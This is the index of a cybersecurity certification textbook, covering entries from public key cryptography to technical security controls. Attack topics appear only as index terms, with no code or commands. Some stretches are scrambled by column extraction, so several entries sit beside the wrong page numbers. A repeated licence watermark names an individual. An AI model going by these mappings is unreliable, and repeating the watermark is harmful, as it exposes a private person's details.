 I-30 | Index
confidentiality of, 112-113
digital certificates, 106, 130
digital envelopes and key
exchange, 105-106
digital signatures, 104-105
elliptic curve cryptography
(ECC), 102
man-in-the-middle attack
(MitM), 116-117
signature algorithm, 108
symmetric encryption, 99
public notification and
disclosure of data breaches, 444
public subnets, 423
public zone signing key, 287
pulverizing, 552
Puppet cloud orchestration
platform, 430
PUPs (potentially unwanted
programs), 82, 83
purple team, penetration
testing, 69
purpose limitation (personal
data), 442
push notifications, 361
Python malicious indicators, 396
Python script environment
branching statements, 392
control block, 391-392
execution of, 392
logic and looping statements,
391-392
modules, 392
variables, 391
Q really simple syndication
qualitative risk assessment,
503-504
quality assurance (QA), 400
quality of service (QoS), 252
quantitative risk assessment
annualized rate of
occurrence (ARO), 503
annual loss expectancy
(ALE), 503
exposure factor (EF), 502
single loss expectancy
(SLE), 502
quantum cryptographic
technology, 120-121
quarantine, 450, 479
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
QuarkMatter, 88 red team, penetration testing,
query (read-only access), 288 68-69
quibits, 120 redundancy strategies
asynchronous and
R synchronous replication, 520
disk redundancy, 519
race conditions, time of check to
fault tolerance and
time of use (TOCTTOU), 368
redundancy, 517
radio firmware, 361
geographical dispersal, 520
radio frequency ID (RFID)
geographical redundancy, 520
alarms, 544
geographical replication, 520
connection method, 359
high availability, 516-517
RADIUS. see remote
maximum tolerable
authentication dial-in user
downtime (MTD), 516
service (RADIUS)
network redundancy, 518
RADIUS Federation, 243
power redundancy, 517-518
rail fence cipher, 98
scalability and elasticity,
rainbow table attacks, 160
516-517
Random Access Memory
Redundant Array of
(RAM), 491
Independent Disks (RAID)
ransomware
disk redundancy, 519
malware classifications, 88-89
geographical redundancy, 520
payload classifications, 82
refactoring, 369
RAs (registration authorities),
regex (regular expression)
128-129
syntax, 279
Raspberry Pi, 332
regional replication, 422
RAT. see remote access trojans
registration authorities (RAs),
(RATs)
128-129
RAT (remote access tool/
registry setting, 326
Trojan), 70
regular expression (regex)
RBAC (role-based access
syntax, 279
control), 199
regulations
RDP (Remote Desktop
Computer Security Act
Protocol), 310
(1987), 13
read-only access (query), 288
General Data Protection
read/write access (update), 288
Regulation (GDPR), 13-14,
442, 443
(RSS), 295
Health Insurance Portability
real-time operating system
and Accountability Act
(RTOS), 332, 361
(HIPAA), 14, 444, 504
real-time transport protocol
Payment Card Industry Data
(RTP), 298-299
Security Standard (PCI DSS),
reception personnel, 546
14, 442, 504
reconnaissance, 381, 460
Sarbanes-Oxley Act (SOX),
Recorded Future, 27
13, 504
recovery agent user, 134
remote access Trojans (RATs)
recovery point objective (RPO),
as attack vectors, 23
509-510, 523
data exfiltration, 448
recovery time, incident response
malware classifications, 86-87
plan (IRP), 459
organizational security, 45
recovery time objective (RTO),
payload classifications, 82
509
penetration testing, 70

remote authentication dial-in
user service (RADIUS)
Challenge Handshake
Authentication Protocol
(CHAP), 166-167
extensible authentication
Protocol (EAP), 166-167
Password Authentication
Protocol (PAP), 166-167
Secure Shell (SSH), 312
remote code execution, 366
Remote Desktop Protocol
(RDP), 310
remote desktop protocol (RDP),
412-413
remote hosts, connectivity, route
and traceroute, 37
remotely triggered blackhole
(RTBH), 249
remote sign-in, Windows
authentication, 154
remote wipe, 349-350
removable media attack vector,
22-23
replay attacks, 374-375
replication, data, 422-423
Representational State Transfer
(REST), 430
reputational threat
intelligence, 26
reputation damage, 443
Request for Comments (RFC), 28
residual risk, 505
resource exhaustion, 368-369
resource policies, 421
response headers
Cache Control, 385
Content Security Policy
(CSP), 385
HTTP Strict Transport
Security (HSTS), 385
restoration order, 527-528
retention policy, 463, 466
retinal scan, 174
retrospective network analysis
(RNA), 472
reverse proxy CASBs, 427
reverse proxy servers, 262
reverse shell, 396
revocation lists, certificate,
138-139
RFC (Request for Comments), 28
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
rich communication services
(RCS), 360-361
rights management services, 450
RIP (Routing Information
Protocol), 219
risk acceptance, 505
Risk and Control Assessment
(RCA), 501
Risk and Control Self-
Assessment (RSCA), 501
risk appetite, 505
Risk Assessment Method
(CIS-RAM), 12
risk assessments (RA), 501
risk avoidance, 504
risk awareness, 505-506
risk deterrence/reduction, 504
risk management
control risk, 505
degree of risk
impact of risk, 500-501
likelihood of threat, 500
guidelines for, 514
heat map risk matrix, 506
inherent risk, 504
processes, 500-501
qualitative risk assessment,
503-504
quantitative risk assessment,
502-503
residual risk, 505
risk acceptance, 505
Risk and Control Assessment
(RCA), 501
Risk and Control Self-
Assessment (RSCA), 501
risk appetite, 505
risk assessments (RA), 501
risk avoidance, 504
risk awareness, 505-506
risk register, 506
risk transference, 505
risk types, 501-502
security assessment, 18
strategies, 504
see also business impact
analysis (BIA)
Risk Management Framework
(RMF)
defined, 11
enterprise risk management
(ERM), 501
Index | I-31
risk mitigation/remediation, 504
risk register, 506
risk response, 500
risk transference, 505
risk types
external, 501
intellectual property (IP)
theft, 501-502
internal, 501
legacy systems, 502
multiparty, 501
software compliance and
licensing, 502
RMF. see risk management
framework (RMF)
rogue access points, 243-244
role-based access control
(RBAC), 199
root accounts, 184-185
root certificates
digital certificates, 135
key recovery, 138
OpenSSL, 141-142
public key infrastructure
(PKI), 127-128
update or revoke, 478
rooting, 353-354
rootkits, 82, 87-88
route, network reconnaissance
tools, 37
routed appliance firewall, 259
route injections (spoofed routing
information) vulnerabilities, 233
router firewall, 260
routers
network appliances, 217-218
network log files, 469
RouterSploit, exploitation
frameworks, 46
route security
software exploits, 233
source routing vulnerabilities,
233
spoofed routing information
(route injections)
vulnerabilities, 233
routing and switching protocols
Address Resolution Protocol
(ARP), 218-219
Border Gateway Protocol
(BGP), 219
Index
 I-32 | Index
Enhanced Interior Gateway
Routing Protocol (EIGRP), 219
Internet Protocol (IP), 219
layer 2 forwarding, 218
layer 3 forwarding, 218
network redundancy, 518
Open Shortest Path First
(OSPF), 219
Routing Information Protocol
(RIP), 219
routing configuration, route and
traceroute, 37-38
Routing Information Protocol
(RIP), 219
RSA algorithm encryption, 101,
104-105
RSS (Really Simple Syndication),
295
rsylog, 468
RTBH (remotely triggered
blackhole), 249
RTP (Real-Time Transport
Protocol), 298-299
rule-based access control
conditional access, 201-202
privileged access
management (PAM), 202
rules of engagement,
penetration tests, 67-68
runbook, 459, 479
S legislation, 13-14
SA (Security Associations), 307
sabotage, insider threats, 22
SAE (Simultaneous
Authentication of Equals), 238
Safari, 470
safes, secure areas, 549
Salesforce, 409
salt, 115, 160
salting
cryptographic attacks, 117
database deidentification
methods, 452
SAM (Security Accounts
Manager), 154
SameSite attributes, 384
SAML (security assertions
markup language), 204-205
Samsung
KNOX, 346
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Samsung Pay, 360
SAN (subject alternative name),
130-131
sandboxing, 329, 401
Sarbanes-Oxley Act (SOX), 13, 504
SASL (Simple Authentication and
Security Layer), 288
SATA, 554
SAWs (secure admin.
workstations), 310
scalability and elasticity, 516-517
scan intrusiveness, 60
scanless, network
reconnaissance tools, 41
SCAP. see Secure Content
Application Protocol (SCAP)
scheduling load balancers, 250
scope, incident response plan
(IRP), 459
screened hosts, 223
screened subnet, 222
screen lock, 349
scripting, 390
script kiddies, defined, 20
script virus, 83
SEAndroid, 347
secret ciphers, 98
secret key, 99, 420
secrets management, 419-420
Sectigo/Comodo, 127
sector-specific (vertical)
secure access service edge
(SASE), 427
secure admin. workstations
(SAWs), 310
secure application concepts
application attack, indicators
DLL injection, 369
driver manipulation, 369
memory leak, 368-369
null pointer dereference,
368
overflow vulnerabilities,
367-368
pass the hash (PtH)
attack, 369-370
privilege escalation,
366-367
race conditions, 368
resource exhaustion,
368-369
deployment and automation
concepts
application development,
deployment, and
automation, 399
automation/scripting
release paradigms, 401-403
provisioning control, 401
secure application
development
environments, 399-401
software diversity, 403
version control, 401
guidelines for, 405
secure coding practices
compiled code, 387
data exposure, 385
dead code, 386
dynamic code analysis,
387-388
memory management, 385
obfuscation/camouflage
code, 386-387
secure code usage, 386
secure coding techniques,
383-384
server-side vs. client-side
validation, 384
static code analysis, 387
unreachable code, 386
web application security,
384-385
secure script environments
execution control, 393-394
malicious code indicators,
394-396
PowerShell script
environment, 392-393
Python script
environment, 390-392
scripting, 390
web application attacks
application programming
interfaces (APIs)
attacks, 374
canonicalization
attack, 379
command injection
attack, 379
cross-site scripting (XSS)
attacks, 376-377

directory traversal
injection attack, 379
extensible markup
language (XML)
injection, 378
Lightweight Directory
Access Protocol (LDAP)
injection, 379
replay attacks, 374-375
server-side request
forgery (SSRF), 380-389
session hijacking, 375-376
structured query
language (SQL) injection
attacks, 377-378
uniform resource locator
(URL) analysis, 372-373
XML External Entity
attack, 378
secure application development
environments
development environments,
400-401
quality assurance (QA), 400
software development life
cycle (SDLC), 399-400
secure application protocols
API considerations, 294-295
email services, 296-298, 297
file transfer services, 295-296
hypertext transfer protocol
secure (HTTPS), 292
subscription services, 295
Transport Layer Security
(TLS), 292-294
voice and video services,
298-299
secure areas
air gaped host, 549
colocation cages, 548-549
demilitarized zone (DMZ), 549
safes, 549
vaults, 549
secure boot, 319
secure cloud solutions
cloud compute security,
420-421
cloud deployment models
community cloud,
408-409
hosted private cloud, 408
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
private cloud, 408
public (multi-tenant)
cloud, 408
cloud security controls
cloud access security
brokers (CASB), 426-427
cloud firewall security, 425
cloud networking
security, 423
cloud storage security,
421-422
data replication, 422-423
high availability (HA),
422-423
identity and access
management (IAM),
419-420
secure web gateway
(SWG), 427
security groups, 425-426
VPCs and transit
gateways, 424
cloud security integration
and auditing, 418-419
cloud service models
anything as a service
(Xaas), 409-410
consultants, 411
infrastructure as a service
(IaaS), 409, 410
Managed Security
Services Provider
(MSSP), 411
platform as a service
(PaaS), 409, 410
Security as a Service
(SECaaS), 411
software as a service
(SaaS), 409
guidelines for, 435
Infrastructure as Code
concepts
application programming
interfaces (APIs), 430
edge computing, 432-433
fog computing, 432-433
infrastructure as code
(IaC), 431
serverless architecture,
430-431
Index | I-33
service integration,
429-430
software-defined
networking (SDN), 431-432
software-defined visibility
(SDV), 432
virtualization technologies
application virtualization,
413-414
components of, 411-412
container virtualization,
413-414
thin clients, 412-413
virtual desktop
environment (VDE), 413
virtual desktop
infrastructure (VDI),
412-413
VM escaping protection,
414-415
VM sprawl avoidance,
415-416
secure code usage, 386
secure coding practices
compiled code, 387
data exposure, 385
dead code, 386
dynamic code analysis,
387-388
memory management, 385
obfuscation/camouflage
code, 386-387
secure code usage, 386
secure coding techniques,
383-384
server-side vs. client-side
validation, 384
static code analysis, 387
unreachable code, 386
web application security,
384-385
secure coding techniques
input validation, 383
normalization, string
inputs, 383
outputting encoding, 383-384
secure configuration
baseline, 401
secure configuration guides
application servers, 13
Index
 I-34 | Index
network appliance platform,
12-13
operating systems (OS), 12-13
vendor-specific guides, 12-13
web server applications, 13
Secure Content Application
Protocol (SCAP), 59
secure cookies
HttpOnly attributes, 384
SameSite attributes, 384
secure data destruction, 552-553
secure directory service, 288-289
Secure Erase (SE), 554
secure filmware, implementing
boot integrity, 319-320
disk encryption, 320-321
end of life (EOL), 322-323
end of service life (EOSL),
322-323
hardware root of trust (RoT),
318-319
organizational security
agreements, 323
third-party risk management,
322
USB and flash drive security,
321-322
secure hash algorithm (SHA),
97-98
secure IMAP (IMAPS), 297
secure mobile device
connections
ad hoc network, 357
bluetooth connection
methods, 358-359
cellular data connections,
356-357
firmware over the air
updates, 361
global positioning system
(GPS), 357
guidelines for implementing,
364
infrared and RFID connection
methods, 359
microwave radio connection
methods, 361-362
multimedia message service
(MMS), 360
near field communications
and mobile payment
services, 359-360
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
personal area networks
(PANs), 357
push notifications, 361
rich communication services
(RCS), 360-361
short message service
(SMS), 360
USB connection methods, 360
Wi-Fi and tethering
connection methods, 357
Wi-Fi direct, 357
Secure Multipart Internet
Message Extensions (S/MINE), 134
Secure/Multipurpose Internet
Mail Extensions (S/MIMI), 297-298
secure network designs
eavesdropping, 227
guidelines for implementing,
254
load balancers
amplification attack,
247-248
application attacks,
247-248
clustering, 250-251
distributed denial of
service (DDoS), 247,
248-249
DNS amplification
attack, 248
layer 4 load balancer, 249
layer 7 load balancer, 249
Network Time Protocol
(NTP), 247-248
operational technology
(OT) attacks, 248
persistence, 250
quality of service
(QoS), 252
scheduling, 250
source IP affinity, 250
network architecture
business workflows, 217
east-west traffic
considerations, 224
IPv6, 224
network appliances,
217-218
network segmentation,
219-220
network segregation, 220
secure network protocols
network topology and
zones, 220-224
routing and switching
protocols, 218-219
weakness of, 216
zero trust, 224-225
network mapping, 227
secure switching and routing
ARP poisoning attacks, 228
loop prevention, 229-230
MAC cloning, 227
MAC flooding, 228-229
man-in-the-middle attack
(MitM), 227
network access control,
231-232
on-path attack, 227
physical port security and
MAC filtering, 230-231
route security, 232-233
secure wireless infrastructure
controller and access
point security, 236-237
disassociation and replay
attacks, 244-245
EAP-Tunneled TLS (EAP-
TTLS), 242-243
enterprise/IEEE 802.1X
authentication, 240-241
extensible authentication
protocol (EAP), 241-242
jamming attacks, 245
open authentication and
captive portals, 239-240
Protected Extensible
Authentication Protocol
(PEAP), 242
RADIUS Federation, 243
rogue access points and
evil twins, 243-244
secure wireless
infrastructure, 243
Wi-Fi authentication
methods, 238-239
Wi-Fi protected access
(WPA), 237-238
Wi-Fi protected setup
(WPS), 239
wireless network
installation
considerations, 235-236

DNS poisoning, 286-287
DNS security, 287-288
domain name resolution,
285-286
guidelines for implementing,
315
network address allocation,
284-285
secure application protocols
API considerations,
294-295
email services, 296-297
file transfer services,
295-296
hypertext transfer
protocol secure
(HTTPS), 292
Secure/Multipurpose
Internet Mail Extensions
(S/MIMI), 297-298
subscription services, 295
Transport Layer Security
(TLS), 292-294
voice and video services,
298-299
secure directory service,
288-289
secure remote access
protocols
Internet Key Exchange
(IKE), 307-308
Internet Protocol Security
(IPSec), 304-309
jump servers, 310-311
out-of-band (OOB)
management, 310
remote access
architecture, 301-302
Remote Desktop Protocol
(RDP), 310
Secure Shell (SSH), 311-313
SSL VPN, 303-304
Transport Layer Security
(TLS) VPN, 303-304
Virtual Network
Computing (VNC), 310
VPN client configuration,
308-309
Simple Network
Management Protocol
(SNMP), 289-290
time synchronization, 289
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Secure POP (POP3S), 297
secure remote access protocols
Internet Key Exchange (IKE),
307-308
Internet Protocol Security
(IPSec), 304-309
jump servers, 310-311
out-of-band (OOB)
management, 310
remote access architecture,
301-302
Remote Desktop Protocol
(RDP), 310
Secure Shell (SSH), 311-313
SSL VPN, 303-304
Transport Layer Security
(TLS) VPN, 303-304
Virtual Network Computing
(VNC), 310
VPN client configuration,
308-309
secure script environments
execution control, 393-394
malicious code indicators
Bourne Again Shell (Bash)
malicious indicators, 396
macros, 396-397
man-in-the-browser
(MitB) attack, 397
PowerShell malicious
indicators, 395
Python malicious
indicators, 396
secure application
concepts, 394-396
Visual Basic for
Applications (VBA), 396-397
PowerShell script
environment, 392-393
Python script environment,
390-392
scripting, 390
Secure Shell (SSH), 70, 311-313
Secure Sockets Layer (SSL),
292, 376
Secure Sockets Tunneling
Protocol (SSTP), 304
secure switching and routing
ARP poisoning attacks, 228
loop prevention, 229-230
MAC cloning, 227
MAC flooding, 228-229
Index | I-35
man-in-the-middle attack
(MitM), 227
network access control, 231-232
on-path attack, 227
physical port security and
MAC filtering, 230-231
route security, 232-233
secure transmission of
credentials, onboarding
policies, 181
secure transport protocol
(SRTP), 299
secure web gateway (SWG),
272, 427
secure wireless infrastructure
controller and access point
security, 236-237
disassociation and replay
attacks, 244-245
EAP-Tunneled TLS (EAP-TTLS),
242-243
EAP with Flexible
Authentication via Secure
Tunneling (EAP-FAST), 243
enterprise/IEEE 802.1X
authentication, 240-241
extensible authentication
protocol (EAP), 241-242
jamming attacks, 245
open authentication and
captive portals, 239-240
Protected Extensible
Authentication Protocol
(PEAP), 242
RADIUS Federation, 243
rogue access points and evil
twins, 243-244
Wi-Fi authentication
methods, 238-239
Wi-Fi protected access (WPA),
237-238
Wi-Fi protected setup
(WPS), 239
wireless network installation
considerations, 235-236
secure zones, 540-541
SecurID, 168
Security Accounts Manager
(SAM), 154
security account types
guest accounts, 183-184
standard users, 183
Index
 I-36 | Index
security and information event
management (SIEM)
correlation rules, 466
dashboard, 466-467
logging platforms, 468-469
retention policy, 466
sensitivity and alerts, 467
sensors, 467
trend analysis, 468
Security as a Service (SECaaS), 411
security assertions markup
language (SAML), 204-205
security assessments
automated vulnerability
scanning, 57-63
common vulnerabilities and
exposures (CVE)
Common Vulnerabilities
Scoring System (CVSS),
59-60
Secure Content
Application Protocol
(SCAP), 59
vulnerability feed, 59
guidelines for, 72
organizational security
exploitation frameworks,
45-46
Netcat, 46-47
network reconnaissance
tools, 36-42
packet analysis, 43-44
packet capture, 42
packet injection and
replay, 44-45
protocol analysis, 42-43
tcpdump, 42-43
traffic analysis, 43-44
penetration testing
defined, 67
exercise types, 68-69
passive and active
reconnaissance, 69-70
pen test attack life cycle, 70
rules of engagement, 67-68
penetration tests, 57
risk management, 18
threat assessments, 18
threat hunting, 57
vulnerability assessments,
18, 57
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
vulnerability scanning
techniques
application and web
application scanners, 59
configuration review, 63
credentialed vs. non-
credentialed scanning, 61
false positives, false
negatives, log reviews,
61-62
intrusive vs. non-
intrusive, 60
network vulnerability
scanner, 58
threat hunting, 64-65
vulnerability types
impact of, 53-54
kernel vulnerabilities,
50-51
legacy platform
vulnerabilities, 51
patch management, 50-51
software vulnerabilities,
50-51
third-party risks, 54-55
weak host configurations,
51-52
weak network
configurations, 52-53
zero-day vulnerability, 51
Security Associations (SA), 307
security content automation
protocol (SCAP), 63
security controls
compensating controls, 10
deterrent controls, 10
functional types
corrective control, 9, 10
detective control, 9, 10
preventative control, 9, 10
guidelines for, 18
managerial security control,
8-10, 9
operational security control,
8-10, 9
physical controls, 9, 10
technical security controls,
8-10, 9
Security-Enhanced Linux, 347
security group-based
privileges, 184
security groups, 425-426
security guards, 544-545
security guidance, 11
security identifier (SID), 191
security information and event
management (SIEM)
analysis and report review,
277-278
cyber threat intelligence
(CTI), 26
file manipulation, 278-279
grep command, 279
intelligence fusion, 64-65
log aggregation, 277
log collection, 276-277
monitoring services, 275
regular expression (regex)
syntax, 279
threat data feeds, 26
security limitations,
cryptographic weaknesses
entropy and weak keys,
114-115
predictability and reuse, 115
security locks, 533
security monitoring data
data privacy and sensitivity
concepts, 438
mobile device management
(MDM)
application management,
352-353
carrier unlocking, 353-354
content management, 353
enterprise mobility
management (EMM), 345
external media, 350
full device encryption, 350
jailbreaking, 353-354
location services, 350-352
mobile access control
systems, 348-349
mobile application
management (MAM), 345
mobile device
deployment models, 344
remote wipe/ kill switch,
349-350
rooting, 353-354
secure mobile device
connections
bluetooth connection
methods, 358-359
 Index | I-37

cellular data connections, segmentation-based SHA (secure hash algorithm),

356-357 containment, 476 97-98
firmware over the air self-encrypting drives (SED), shared accounts, 186-187
updates, 361 321, 554 shared authority, 182
global positioning system self-signed certificates, 135 shellcode, 85, 394
(GPS), 357 sensitive data, 441 shielding signals, 550
infrared and RFID sensitivity and alerts, 467 Shikata Ga Nai, 403
connection methods, 359 sensors, 335, 467 shim, 369
microwave radio sensors, site security, 543-544 short message service (SMS),
connection methods, sentiment analysis, 278 170, 360
361-362 separation of duties, 182 short term retention, 522
multimedia message serial attached SCIS (SAS), shoulder surfing, 77
service (MMS), 360 527, 554 shredding/pulping, 552
near field Server Authentication, 132 SID (security identifier), 191
communications and server-based errors (500 range), sideloading, 353
mobile payment services, 470 SIEM. see security information
359-360 server certificate and event management (SIEM)
push notifications, 361 domain validation (DV), Signal, 458
rich communication 132-133 signature algorithm, 108, 130
services (RCS), 360-361 extended validation (EV), 133 signature-based detection,
short message service serverless architecture, 430-431 270-271
(SMS), 360 server-side attacks, 377-378 signature recognition, 175
USB connection methods, server-side request forgery SiLK suite, 473
360 (SSRF), 380-389 SIM. see subscriber identity
Wi-Fi and tethering server-side vs. client-side module (SIM)
connection methods, validation, 384 Simple Authentication and
357-358 service discovery, Nmap Security Security Layer (SASL), 288
Security Onion, SIEM Scanner, 39-40 simple bind, 288
dashboard, 467 service integration, 429-430 simple message service (SMS),
security operations center (SOC), service level agreement (SLA), SMiShing, 78
5, 457 323, 418, 445 Simple Network Management
security orchestration, service models Protocol (SNMP), 38, 275, 289-290
automation, and response local service accounts, 185 Simple Object Access Protocol
(SOAR) network service accounts, 186 (SOAP), 204-205
automation courses of system accounts, 185 simulations, 462
action, 402-403 service organization control Simultaneous Authentication of
IR mitigation controls, 479 (SOC2), 11-12 Equals (SAE), 238
network security service organization control single CA, 127
appliances, 278 (SOC3), 12 single loss expectancy (SLE), 502
security policy service-oriented architecture single pass zero filling, 553
defined, 4 (SOA) for clouds, 429 single points of failure (SPoF),
shared authority, 182 service set identifier (SSID), 235 510-511
standard operating session hijacking single sign-on (SSO), 155
procedures (SOPs), 182 clickjacking, 376 sinkhole routing, 249
security roles cross-site request forgery SIP (Session Initiation Protocol),
CIA Triad, 2 (XSRF)/(CSRF), 375-376 298-299
competencies, 3-4 Secure Sockets Layer (SSL) site layout, 540-541
guidelines for, 18 strip attack, 376 site resiliency, 532-533
information security, PAIN, 2 Session Initiation Protocol (SIP), site risk assessment, 511
Security Technical 298-299, 471 site security
Implementations Guides sFlow, 473 alarm systems and sensors,
(STIGs), 12 SFTP (SSH FTP), 296 543-544

Index

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 I-38 | Index
barricades and entry/exit
points, 541
cable locks, 543
fencing, 541
gateways and locks, 542-543
industrial camouflage, 541
lighting, 541
mantraps, 543
physical access controls, 540
physical attacks of smart
cards and USB, 543
reception personnel and ID
badges, 546
security guards and cameras,
544-545
site layout, 540-541
site survey, 236
site-to-site model, 302
skimming, card attacks, 543
SkyHigh Networks, 426
Sleuth Kit, 491
Small Computer System
Interface (SCSI), 520
smart buildings, 336
smart card attacks, 543
smart-card authentication, 164
smart cards, 164
smart devices, 335
smart meter, 336
smartphone authentication,
348-349
S/MIMI (Secure/Multipurpose
Internet Mail Extensions), 297-298
S/MINE (Secure Multipart Internet
Message Extensions), 134
SMiShing, 78
SMS (Short Message Service), 170
SMS (simple message service), 78
SMTPS, 296
Smurf, 248
Sn1per, exploitation
frameworks, 46
snapshot, 495
snapshot backups, 525-526
sniffing, test access port (TAP), 42
SNMP (Simple Network
Management Protocol), 38, 275,
289-290
Snort, 268-269
snowflake systems, 431
SOAP (Simple Object Access
Protocol), 204-205
Index
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
SOAR. see security orchestration,
automation, and response
(SOAR)
SOC. see security operations
center (SOC)
SOC2. see service organization
control (SOC2)
SOC3. see service organization
control (SOC3)
social engineering techniques
active reconnaissance, 69
credential databases, 77
credential harvesting, 82
defined, 74
dumpster diving, 76
guidelines for, 93
hoaxes, 78-79
identity fraud, 77
impersonation and trust,
75-76
influence campaigns, 82
invoice scams, 77
lunchtime attacks, 77
pharming, 79
phishing, 77-78
piggy backing, 76
prepending, 78-79
pretexting, 75-76
principles of, 74-75
shoulder surfing, 77
SMiShing, 78
spam, 78-79
spear phishing, 78
tailgating, 76
typosquatting, 79
vishing, 77-78
watering hole attack, 79
whaling, 77-78
social media
analysis, 208
as attack vectors, 23
threat research sources, 28
social proof, 75
Social Security Number (SSN), 441
soft power, 82
software as a service (SaaS), 409
software compliance and
licensing threat, 502
software-defined networking
(SDN), 431-432
software-defined visibility
(SDV), 432
software development kit
(SDK), 386
software development life cycle
(SDLC)
agile development, 400
waterfall model, 400
software diversity, 403
software exploits, 233
Software Restriction Policies
(SRP), 394
software vulnerabilities, 19, 50-51
solid state drives (SSD)
Instant Secure Erase (ISE), 554
nonvolatile storage media, 493
Secure Erase (SE), 554
secure filmware,
implementing, 320
Something You Are
Authentication, 151
Something You Can Do
Authentication, 152
Something You Do
Authentication, 151
Something You Exhibit
Authentication, 152
Something You Have
Authentication, 150-151
Something You Know
Authentication, 150, 152
Somewhere You Are
Authentication, 152
sophistication level, of threat
actors, 19
SOPs (standard operating
procedures), 182, 194
source IP affinity, 250
source routing vulnerabilities, 233
SOX. see Sarbanes-Oxley Act (SOX)
spam, 78-79, 86-87
Spamhaus, open source
intelligence (OSINT), 28
SPAN (switched port analyzer),
42, 269-270
Spanning Tree Protocol (STP), 228
spear phishing, 78
specialized systems
facility automation, 336-337
medical devices, 338
multifunction printers
(MFPs), 337
vehicles and drones, 338
Voice over IP (VoIP), 337

Special Publications (NIST), 11
spectrum analyzer, 245
split tunnel, VPN client
configuration, 309
spoofed routing information
(route injections) vulnerabilities,
233
spyware, 85
SQL injection attacks, 377-378
SRTP (secure transport
protocol), 299
SSAE. see Statements on
Standards for Attestation
Engagements (SSAE)
SSH. see Secure Shell (SSH)
SSH client authentication, 312
SSH commands, 313
SSH FTP (SFTP), 296
SSID (service set identifier), 235
SSL (Secure Sockets Layer), 292
SSL VPN, 303-304
SSO (single sign-on), 155, 295
SSRF. see server-side request
forgery (SSRF)
SSTP (Secure Sockets Tunneling
Protocol), 304
stacked overflow, 367
Staged Payloads, 347
staging, development
environments, 400
stakeholder management,
incident response (IR), 458
standalone intrusion
mechanism, 87
standard naming conventions,
531
standard operating procedures
(SOPs), 182, 194
standards, 13-14
standard users, 183
stapling, 140
Start-Process, 395
STARTTLS, 288, 296
state actors, 20-21, 21
stateful inspection firewalls
application aware firewalls,
258
application layer (OSI
Layer 7), 258
iptables, 258-259
state table, 257
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
transport layer (OSI Layer 4),
257-258
state laws, 14
stateless operations, 256
stateless protocol, 374
Statements on Standards for
Attestation Engagements (SSAE),
11-12
states of data
data at rest, 447
data in processing, 447-448
data in transit (motion), 447
data in use, 447
state table, 257
static acquisition, 493
static and dynamic source
NAT, 264
static code analysis, 387
static known treats, 19
statistical deviation analysis, 468
steganography, 121-122
STIGs, 12
Stingray/International Mobile
Subscriber Identity (IMSI)
catcher, 361
storage area networks (SANs),
520, 527
storage profiles, 421
storage segmentation, 353
stored procedures, 386
STP (Spanning Tree Protocol), 228
strategic intelligence, 487-488
stratum 1 (Top-Level NTP
servers), 289
stream ciphers, 100
stress testing, 387-388
structured exception handler
(SEH), 385
structured query language (SQL)
injection attacks, 377-378
structured threat information
eXpression (STIX)
OASIS CTI framework, 29-30
Trusted Automated
eXchange of Indicator
Information (TAXII), 30
structured threats, 19
subject alternative name (SAN),
digital certificates, 130-131
subject name attributes, 130-131
subscriber identity module
(SIM), 333
Index | I-39
subscription services, 295
substitution cipher, 98
superuser account
identity and account
management controls,
184-185
weak host configurations, 51
supervisory control and data
acquisition (SCADA), 334-335
supplicant, 166
supply chain, as attack vectors, 23
supply chain assessment, third-
party risks, 54-55
Suricata, 268
surveillance systems, 336-337,
544-545
suspended certificates, 138-139
SWG (secure web gateway), 272
switched port analyzer (SPAN),
42, 269-270
switches, 217, 469, 518
Symantec
Blue Coat, 426
data loss prevention (DLP), 450
Symantec/Broadcom, 345
symmetric cipher, 112
symmetric encryption
Advanced Encryption
Standard (AES), 100
block ciphers, 100
bulk encryption, 105-106
cryptographic concepts, 96
defined, 99
digital envelopes, 105-106
initialization vector (IV), 100
key Exchange, 105-106
key length, 100
secret key, 99
stream ciphers, 100
synchronous replication, 520
SYN flood attacks, 247
Sysinternals, 90-91
syslog, 468
syslog-ng, 468-469
system accounts, 185
system and security logs, 469
system-enforced account
policies, 192-193
system integration, third-party
risks, 54
system memory acquisition
crash dump, 492
Index
 I-40 | Index

hibernation file, 492-493 theHarvester, network behavioral threat research, 26

live acquisition, 492 reconnaissance tools, 41 closed/proprietary, 26-27
pagefile, 492-493 The Onion Router (TOR), dark guidelines for, 33
system memory dump, 471 net, 25, 26 Information Sharing and
System Monitor, 91 thin clients, 412-413 Analysis Centers (ISACs), 27
system on chip (SoC), 332 third-party app stores, 353 open source intelligence
third-party library, 386 (OSINT)
T third-party risks AT&T Security, 27
cloud-based versus Malware Information
tabletop exercises, 461-462, 512
on-premises risks, 55 Sharing Project (MISP), 27
TACACS+ (terminal access
data storage, 55 Spamhaus, 28
controller access-control
management of, 322 VirusTotal, 28
system), 167
outsource code reputational threat
tactics, techniques, and
development, 55 intelligence, 26
procedures (TTP)
vendor management, 54 threat data feeds, 26
of cyber adversaries, 25, 459
vulnerability types, 53-54 vendor websites, 27
MITRE ATT&CK, 460-461
threat actors threat intelligence sources
threat intelligence sources, 28
attack surface of, 22-23 artificial intelligence (AI), 31
tail commands, 278
attributes of guidelines for, 33
tailgating, 76, 543
capability and resources indicator of compromise
tangible assets, 510
of, 19 (IoC), 28-29
TAP (test access port), 42, 269-270
external threat, 19 providers, 26-28
Target data breach, 23
funding, 19 research sources, 25-26, 28
targeted threats, 19
intent/motivation, 19 tactics, techniques, and
TCP (Transport Control
internal threat, 19 procedures (TTP), 28
Protocol), 52
sophistication level, 19 threat data feeds, 29-30
TCP ACK packet, 38
threat analytics platform, threat maps, threat data feeds, 30
TCP three-way handshake, 257
intelligence fusion, 64-65 threat research sources
TCP/UDP ports, nslookup/dig,
threat assessments, security academic journals, 28
40-41
assessment, 18 conferences, 28
Teamviewer, 310
threat data feeds dark net, 25-26
technical security controls, 8
